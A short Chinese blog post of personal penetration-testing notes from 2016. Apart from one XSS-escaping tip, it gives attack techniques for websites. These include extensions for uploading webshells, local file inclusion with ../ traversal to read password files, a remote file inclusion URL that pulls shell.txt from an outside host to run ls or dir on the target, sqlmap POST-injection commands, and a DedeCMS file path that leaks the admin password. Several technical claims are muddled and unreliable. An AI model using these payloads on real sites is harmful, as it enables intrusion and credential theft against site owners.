您的位置:首页 > 其它

2016.5.19渗透经验总结

2016-05-20 01:26 281 查看
PHP下防跨站用PHP自带的strip_tags()和htmlspecialchars()可以对用户提交的
html和PHP进行转换,对UPDATE和INSERT中的变量用以上两个函数转换

如果PHP假设在win上那么就可以解析cer,asa,aspx,asax,aspx,cdx格式的文件
而在Linux,Unix上则可以解析pl,PHP3,格式的文件(pl:perl语言)

PHP2,PHP,Inc,pwml,asa,cer利用上传webshell

如果PHP使用了文件包含的方法则用 www.xxx.com/index.php?page=./admin.php
就可以读取当前路径下admin.php文件的内容了,也可以用../跳转到其他目录去查看其
它文件 Linux下如果路径对则可以读出密码文件若不对可以用../不断探测
Linux主机下 www.xxx.com/index.php?page=http://www.hack.com/shell.txt?shell=ls
-a 可以遍历当前目录下的所有文件,win下提交www.xxx.com/index.php?
page=http://www.hack.com/shell.txt?shell=dir 同样遍历文件

sqlmap的post注入新学到的方法:在网站中找到表单提交的地方,填写信息提交,抓
包,抓到的包存在txt文件中,运行sqlmap,sqlmap.py -r 文件路径
sqlmap,sqlmap.py -r 文件路径 --current-db 读取当前数据库

织梦cms 配置文件地址 data/admin/ 下,其中的ver.txt 存放的是系统的版本时间
,系统文件时间,找到相应版本的日志文件地址。里面可以爆出管理员密码,找到后台
即可登录。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  经验 总结 渗透